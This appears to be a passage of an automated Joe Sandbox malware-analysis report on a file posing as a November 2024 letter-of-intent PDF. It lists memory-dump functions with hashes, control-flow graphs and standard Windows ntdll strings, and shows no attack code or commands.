                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6fb43c64b42698d8c612b6ae47468350069d817f2ac2fb917b9a4989736cd0fc
                                                                                      • Instruction ID: 0d2073082d84b3a1796106e68da40fb7b537a433661529caf878df8fd509d08a
                                                                                      • Opcode Fuzzy Hash: 6fb43c64b42698d8c612b6ae47468350069d817f2ac2fb917b9a4989736cd0fc
                                                                                      • Instruction Fuzzy Hash: 2490023124140413D14271589504606000957D0641F95C413A1434515E86558B5AAAA2
                                                                                      Function 32FD2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 66f30bc9c75fb3222779ae4d113c5019dc9eff2ae274cf7170d90c0ece9d8451
                                                                                      • Instruction ID: e06264720de58cbcd97e653be112e30030af2ff25f7d5b9ffe99c9cde57f5f1a
                                                                                      • Opcode Fuzzy Hash: 66f30bc9c75fb3222779ae4d113c5019dc9eff2ae274cf7170d90c0ece9d8451
                                                                                      • Instruction Fuzzy Hash: 9D90022130140013D1417158A518606400597E1701F55D412E1424515CD915895A5263
                                                                                      Function 32FD2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6bb4bd3d4ccccaac76d7637218d08b3ced96b26ada53de3c5ebbc15c0f7f1a28
                                                                                      • Instruction ID: 94718dc98b5027c0406771faea2d50196c01db3dc51122cf6def2ee46e84aaa5
                                                                                      • Opcode Fuzzy Hash: 6bb4bd3d4ccccaac76d7637218d08b3ced96b26ada53de3c5ebbc15c0f7f1a28
                                                                                      • Instruction Fuzzy Hash: 0590022921340013D1817158A50860A000547D1602F95D816A1025519CC915896D5362
                                                                                      Function 32FD2D00 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 90e9573b9e6865450faf8d72062dece0d059ee13bbb59d87b3741d501a602210
                                                                                      • Instruction ID: 170991545c9f20b639f3dd63f279610d258495ff669183ac16a562bb2a7e1ab8
                                                                                      • Opcode Fuzzy Hash: 90e9573b9e6865450faf8d72062dece0d059ee13bbb59d87b3741d501a602210
                                                                                      • Instruction Fuzzy Hash: D790022120544453D1017558A508A06000547D0605F55D412A2074556DC6358955A172
                                                                                      Function 32FD2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                      • Instruction ID: 870c202f0fb57576c270ecc25e3c38f0deb080d0d35b360447486144c6240356
                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Function 32FD2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1126 32fd2890-32fd28b3 1127 32fd28b9-32fd28cc 1126->1127 1128 3300a4bc-3300a4c0 1126->1128 1130 32fd28dd-32fd28df 1127->1130 1131 32fd28ce-32fd28d7 1127->1131 1128->1127 1129 3300a4c6-3300a4ca 1128->1129 1129->1127 1132 3300a4d0-3300a4d4 1129->1132 1134 32fd28e1-32fd28e5 1130->1134 1131->1130 1133 3300a57e-3300a585 1131->1133 1132->1127 1135 3300a4da-3300a4de 1132->1135 1133->1130 1136 32fd2988-32fd298e 1134->1136 1137 32fd28eb-32fd28fa 1134->1137 1135->1127 1138 3300a4e4-3300a4eb 1135->1138 1141 32fd2908-32fd290c 1136->1141 1139 3300a58a-3300a58d 1137->1139 1140 32fd2900-32fd2905 1137->1140 1142 3300a564-3300a56c 1138->1142 1143 3300a4ed-3300a4f4 1138->1143 1139->1141 1140->1141 1141->1134 1144 32fd290e-32fd291b 1141->1144 1142->1127 1145 3300a572-3300a576 1142->1145 1146 3300a4f6-3300a4fe 1143->1146 1147 3300a50b 1143->1147 1148 3300a592-3300a599 1144->1148 1149 32fd2921 1144->1149 1145->1127 1150 3300a57c call 32fe0050 1145->1150 1146->1127 1151 3300a504-3300a509 1146->1151 1152 3300a510-3300a536 call 32fe0050 1147->1152 1157 3300a5a1-3300a5c9 call 32fe0050 1148->1157 1153 32fd2924-32fd2926 1149->1153 1168 3300a55d-3300a55f 1150->1168 1151->1152 1152->1168 1154 32fd2928-32fd292a 1153->1154 1155 32fd2993-32fd2995 1153->1155 1159 32fd292c-32fd292e 1154->1159 1160 32fd2946-32fd2966 call 32fe0050 1154->1160 1155->1154 1163 32fd2997-32fd29b1 call 32fe0050 1155->1163 1159->1160 1165 32fd2930-32fd2944 call 32fe0050 1159->1165 1175 32fd2969-32fd2974 1160->1175 1163->1175 1165->1160 1172 32fd2981-32fd2985 1168->1172 1175->1153 1177 32fd2976-32fd2979 1175->1177 1177->1157 1178 32fd297f 1177->1178 1178->1172
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105
                                                                                      • Opcode ID: eb21b6f6942be643ada894817a7e9b371edbee02e55095a53477349ad6c72e6a
                                                                                      • Instruction ID: bc8fdf36cdc16bcacbc8df23b0741ee286366319f2cccae0162d7dc58d589721
                                                                                      • Opcode Fuzzy Hash: eb21b6f6942be643ada894817a7e9b371edbee02e55095a53477349ad6c72e6a
                                                                                      • Instruction Fuzzy Hash: D4513FB6A04216BFEB10CF98C89097EF7B8BF08341754896AE654E3645D734DE04CBE0
                                                                                      Function 33042410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1179 33042410-33042433 1180 330424ec-330424ff 1179->1180 1181 33042439-3304243d 1179->1181 1183 33042501-3304250a 1180->1183 1184 33042513-33042515 1180->1184 1181->1180 1182 33042443-33042447 1181->1182 1182->1180 1185 3304244d-33042451 1182->1185 1183->1184 1186 3304250c 1183->1186 1187 33042517-3304251b 1184->1187 1185->1180 1188 33042457-3304245b 1185->1188 1186->1184 1189 3304251d-3304252c 1187->1189 1190 33042538-3304253e 1187->1190 1188->1180 1192 33042461-33042468 1188->1192 1193 33042540 1189->1193 1194 3304252e-33042536 1189->1194 1191 33042543-33042547 1190->1191 1191->1187 1195 33042549-33042556 1191->1195 1196 330424b6-330424be 1192->1196 1197 3304246a-33042471 1192->1197 1193->1191 1194->1191 1198 33042564 1195->1198 1199 33042558-33042562 1195->1199 1196->1180 1200 330424c0-330424c4 1196->1200 1201 33042484 1197->1201 1202 33042473-3304247b 1197->1202 1203 33042567-33042569 1198->1203 1199->1203 1200->1180 1204 330424c6-330424ea call 32fe0510 1200->1204 1206 33042489-330424ab call 32fe0510 1201->1206 1202->1180 1205 3304247d-33042482 1202->1205 1208 3304258d-3304258f 1203->1208 1209 3304256b-3304256d 1203->1209 1217 330424ae-330424b1 1204->1217 1205->1206 1206->1217 1214 33042591-33042593 1208->1214 1215 330425ae-330425d0 call 32fe0510 1208->1215 1209->1208 1212 3304256f-3304258b call 32fe0510 1209->1212 1224 330425d3-330425df 1212->1224 1214->1215 1219 33042595-330425ab call 32fe0510 1214->1219 1215->1224 1221 33042615-33042619 1217->1221 1219->1215 1224->1203 1226 330425e1-330425e4 1224->1226 1227 330425e6-33042610 call 32fe0510 1226->1227 1228 33042613 1226->1228 1227->1228 1228->1221
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105
                                                                                      • Opcode ID: 6a32e2523925a1c579ab6854c5035eabc2bad6f7dc0442a1266fb20f98d4402c
                                                                                      • Instruction ID: 2a4eab26570388ab122651cc1b6fbc56d795dfa73b79523f51eb6152ade0dafb
                                                                                      • Opcode Fuzzy Hash: 6a32e2523925a1c579ab6854c5035eabc2bad6f7dc0442a1266fb20f98d4402c
                                                                                      • Instruction Fuzzy Hash: FD51D475B00745ABEB20DE98C89097EB7FDEF84240B4488AAE5D9D7641EB74DB408B60
                                                                                      Function 3306A670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1428 3306a670-3306a6e9 call 32fa2410 * 2 RtlDebugPrintTimes 1434 3306a89f-3306a8c4 call 32fa25b0 * 2 call 32fd4c30 1428->1434 1435 3306a6ef-3306a6fa 1428->1435 1437 3306a724 1435->1437 1438 3306a6fc-3306a709 1435->1438 1442 3306a728-3306a734 1437->1442 1440 3306a70f-3306a715 1438->1440 1441 3306a70b-3306a70d 1438->1441 1445 3306a7f3-3306a7f5 1440->1445 1446 3306a71b-3306a722 1440->1446 1441->1440 1443 3306a741-3306a743 1442->1443 1447 3306a736-3306a73c 1443->1447 1448 3306a745-3306a747 1443->1448 1449 3306a81f-3306a821 1445->1449 1446->1442 1451 3306a73e 1447->1451 1452 3306a74c-3306a750 1447->1452 1448->1449 1453 3306a827-3306a834 1449->1453 1454 3306a755-3306a77d RtlDebugPrintTimes 1449->1454 1451->1443 1456 3306a86c-3306a86e 1452->1456 1457 3306a836-3306a843 1453->1457 1458 3306a85a-3306a866 1453->1458 1454->1434 1466 3306a783-3306a7a0 RtlDebugPrintTimes 1454->1466 1456->1449 1461 3306a845-3306a849 1457->1461 1462 3306a84b-3306a851 1457->1462 1463 3306a87b-3306a87d 1458->1463 1461->1462 1467 3306a857 1462->1467 1468 3306a96b-3306a96d 1462->1468 1464 3306a870-3306a876 1463->1464 1465 3306a87f-3306a881 1463->1465 1469 3306a8c7-3306a8cb 1464->1469 1470 3306a878 1464->1470 1471 3306a883-3306a889 1465->1471 1466->1434 1476 3306a7a6-3306a7cc RtlDebugPrintTimes 1466->1476 1467->1458 1468->1471 1472 3306a99f-3306a9a1 1469->1472 1470->1463 1473 3306a8d0-3306a8f4 RtlDebugPrintTimes 1471->1473 1474 3306a88b-3306a89d RtlDebugPrintTimes 1471->1474 1473->1434 1479 3306a8f6-3306a913 RtlDebugPrintTimes 1473->1479 1474->1434 1476->1434 1481 3306a7d2-3306a7d4 1476->1481 1479->1434 1488 3306a915-3306a944 RtlDebugPrintTimes 1479->1488 1483 3306a7d6-3306a7e3 1481->1483 1484 3306a7f7-3306a80a 1481->1484 1485 3306a7e5-3306a7e9 1483->1485 1486 3306a7eb-3306a7f1 1483->1486 1487 3306a817-3306a819 1484->1487 1485->1486 1486->1445 1486->1484 1489 3306a80c-3306a812 1487->1489 1490 3306a81b-3306a81d 1487->1490 1488->1434 1494 3306a94a-3306a94c 1488->1494 1491 3306a814 1489->1491 1492 3306a868-3306a86a 1489->1492 1490->1449 1491->1487 1492->1456 1495 3306a972-3306a985 1494->1495 1496 3306a94e-3306a95b 1494->1496 1497 3306a992-3306a994 1495->1497 1498 3306a963-3306a969 1496->1498 1499 3306a95d-3306a961 1496->1499 1500 3306a996 1497->1500 1501 3306a987-3306a98d 1497->1501 1498->1468 1498->1495 1499->1498 1500->1465 1502 3306a98f 1501->1502 1503 3306a99b-3306a99d 1501->1503 1502->1497 1503->1472
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: HEAP:
                                                                                      • API String ID: 3446177414-2466845122
                                                                                      • Opcode ID: 8ba0d5b9d830d801bcdd97c6bb4a687eca11b4df423403393d4b162bd72dfe93
                                                                                      • Instruction ID: 41c8f01da93cc8e437b8d47df69f2d0d6606fe0e37000ddc44b6972647b5c077
                                                                                      • Opcode Fuzzy Hash: 8ba0d5b9d830d801bcdd97c6bb4a687eca11b4df423403393d4b162bd72dfe93
                                                                                      • Instruction Fuzzy Hash: E8A19EB5B043118FD704EE18C890A1AB7E5FF88758F1949ADE985EB315EB70EC06CB91
                                                                                      Function 32FC7630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1504 32fc7630-32fc7651 1505 32fc768b-32fc7699 call 32fd4c30 1504->1505 1506 32fc7653-32fc766f call 32f9e660 1504->1506 1511 33004638 1506->1511 1512 32fc7675-32fc7682 1506->1512 1515 3300463f-33004645 1511->1515 1513 32fc769a-32fc76a9 call 32fc7818 1512->1513 1514 32fc7684 1512->1514 1522 32fc76ab-32fc76c1 call 32fc77cd 1513->1522 1523 32fc7701-32fc770a 1513->1523 1514->1505 1517 32fc76c7-32fc76d0 call 32fc7728 1515->1517 1518 3300464b-330046b8 call 3301f290 call 32fd9020 RtlDebugPrintTimes BaseQueryModuleData 1515->1518 1517->1523 1528 32fc76d2 1517->1528 1518->1517 1536 330046be-330046c6 1518->1536 1522->1515 1522->1517 1526 32fc76d8-32fc76e1 1523->1526 1530 32fc770c-32fc770e 1526->1530 1531 32fc76e3-32fc76f2 call 32fc771b 1526->1531 1528->1526 1535 32fc76f4-32fc76f6 1530->1535 1531->1535 1538 32fc76f8-32fc76fa 1535->1538 1539 32fc7710-32fc7719 1535->1539 1536->1517 1540 330046cc-330046d3 1536->1540 1538->1514 1541 32fc76fc 1538->1541 1539->1538 1540->1517 1542 330046d9-330046e4 1540->1542 1543 330047be-330047d0 call 32fd2c50 1541->1543 1545 330047b9 call 32fd4d48 1542->1545 1546 330046ea-33004723 call 3301f290 call 32fdaaa0 1542->1546 1543->1514 1545->1543 1553 33004725-33004736 call 3301f290 1546->1553 1554 3300473b-3300476b call 3301f290 1546->1554 1553->1523 1554->1517 1559 33004771-3300477f call 32fda770 1554->1559 1562 33004781-33004783 1559->1562 1563 33004786-330047a3 call 3301f290 call 3300cf9e 1559->1563 1562->1563 1563->1517 1568 330047a9-330047b2 1563->1568 1568->1559 1569 330047b4 1568->1569 1569->1517
                                                                                      Strings
                                                                                      • Execute=1, xrefs: 33004713
                                                                                      • ExecuteOptions, xrefs: 330046A0
                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 33004725
                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 330046FC
                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 33004787
                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 33004742
                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 33004655
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                      • API String ID: 0-484625025
                                                                                      • Opcode ID: 01f978c815d26e69da4e56bd1562f03bd80ae4e7b9551d152c858a7b8c416e02
                                                                                      • Instruction ID: 0a672bc8f81272be4c184233520d55d6e84c4c32b17d8c5dbcc939544b9533d1
                                                                                      • Opcode Fuzzy Hash: 01f978c815d26e69da4e56bd1562f03bd80ae4e7b9551d152c858a7b8c416e02
                                                                                      • Instruction Fuzzy Hash: 5A511AB5A0032E6AFB10AAA4DC85FAE77ACEF04744F4009E9D709A7191EB709E45CF54
                                                                                      Function 32FAA250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 32FF79D0, 32FF79F5
                                                                                      • Actx , xrefs: 32FF7A0C, 32FF7A73
                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32FF7AE6
                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32FF79D5
                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32FF79FA
                                                                                      • SsHd, xrefs: 32FAA3E4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                      • API String ID: 0-1988757188
                                                                                      • Opcode ID: 2802a23606dcd36de929f4a087e825514c20049541803a8cc5317db42ead8369
                                                                                      • Instruction ID: fc86a80f282b746ed641d340869116f013ee7c098608d2e951348db5052bc1f7
                                                                                      • Opcode Fuzzy Hash: 2802a23606dcd36de929f4a087e825514c20049541803a8cc5317db42ead8369
                                                                                      • Instruction Fuzzy Hash: F5E1B1756043828FE714CE24C8A4B5AB7F1AB84358F504F2DEE558B3A0DB32D949CF91
                                                                                      Function 32FAD770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 32FF9341, 32FF9366
                                                                                      • Actx , xrefs: 32FF9508
                                                                                      • GsHd, xrefs: 32FAD874
                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32FF9346
                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32FF9565
                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32FF936B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                      • API String ID: 3446177414-2196497285
                                                                                      • Opcode ID: 6922b4657a9b70cc6892f735ca071d7d1f09b3a2026fe625418b1ec89796eec6
                                                                                      • Instruction ID: 25657d9660c8fb1b5ba184c2af39cd9a6c1c3363dc3b9d35446d54813bc13bba
                                                                                      • Opcode Fuzzy Hash: 6922b4657a9b70cc6892f735ca071d7d1f09b3a2026fe625418b1ec89796eec6
                                                                                      • Instruction Fuzzy Hash: F6E1F1B56043029FE704CF24C8A0B5AB7E4BF88758F444E6DEA95CB291DB71E844CF82
                                                                                      Function 32F8645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlDebugPrintTimes.NTDLL ref: 32F8656C
                                                                                        • Part of subcall function 32F865B5: RtlDebugPrintTimes.NTDLL ref: 32F86664
                                                                                        • Part of subcall function 32F865B5: RtlDebugPrintTimes.NTDLL ref: 32F866AF
                                                                                      Strings
                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32FE9A01
                                                                                      • LdrpInitShimEngine, xrefs: 32FE99F4, 32FE9A07, 32FE9A30
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 32FE9A11, 32FE9A3A
                                                                                      • apphelp.dll, xrefs: 32F86496
                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 32FE9A2A
                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 32FE99ED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-204845295
                                                                                      • Opcode ID: 4d5a467f331f27b432e279dcd3cbd97ff8561f6d179adecfba0137c9b7aaeb21
                                                                                      • Instruction ID: 5d6d5c1da79d33ca7413f112b68996d376dac6c9ccd211666812e6e2b075f2c5
                                                                                      • Opcode Fuzzy Hash: 4d5a467f331f27b432e279dcd3cbd97ff8561f6d179adecfba0137c9b7aaeb21
                                                                                      • Instruction Fuzzy Hash: 545192756083049FE325DF24D851B9BB7E4EF84784F400D5AFB95AB260DB30E945CBA2
                                                                                      Function 3300FD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
